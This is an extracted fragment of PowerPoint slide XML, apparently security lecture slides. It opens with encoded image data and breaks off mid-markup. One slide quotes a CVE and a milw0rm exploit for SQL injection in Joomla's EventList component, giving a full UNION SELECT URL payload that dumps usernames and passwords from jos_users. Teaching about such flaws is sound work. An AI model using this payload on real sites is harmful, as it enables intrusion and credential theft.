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KhFb9ZfOer706y+c9X3oNq+D/jLEzCT8FSQxvdi3PLXTmoWuEXYw6iCCZGgZgRl0N9z8+Vv1l856vvTrL5z1feg2b4D/nmD7E/9L10tNM0UCdXW0eU5XO/ZpXPHwQcG8nwrC/PezMKqt8L/Kv3CHAiNzakkdmle/ssj5MtwyjKzMdlovQBYm81g//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it-IT" altLang="it-IT" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2048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060848"/>
            <a:ext cx="4985742" cy="24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5" name="CasellaDiTesto 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="460375" y="5084763"/>
            <a:ext cx="828833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Requirements:</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nerdy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in the computer science sense</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nothing you can make a girl/boy fall in love with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It must be as unknown as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1557338"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cvedetails.com/cve/CVE-2007-4509/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL injection vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>EventList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> component (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>com_eventlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) 0.8 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the did parameter in a details action. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Ritaglio schermat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258972"/>
            <a:ext cx="8478433" cy="2086266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105100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sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>http://www.milw0rm.com/exploits/4309</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rettangolo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2348880"/>
            <a:ext cx="8280920" cy="39900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r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>[[SQL]]]---------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>http://[target]/[path]//index.php?option=com_eventlist&amp;func=details&amp;did=[SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>index.php?option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>com_eventlist&amp;func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>details&amp;did</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>=9999999999999%20union%20select%200,0,concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>(117,115,101,114,110,97,109,101,58),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>username,char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>[[/SQL]]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t>"""""""""""""""""""""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>ajann,Turkey</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t># Im </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
              <a:t> Hacker!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-I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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>DICTIONARY - I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8229600" cy="4454525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>playfield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>Computers</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>Networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>Humans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>stupid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>stupid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>ones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>players</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>Attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>black and white hackers </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>[Red &amp; Purple Team]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>Defenders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>sysadmins</a:t>
            </a:r>
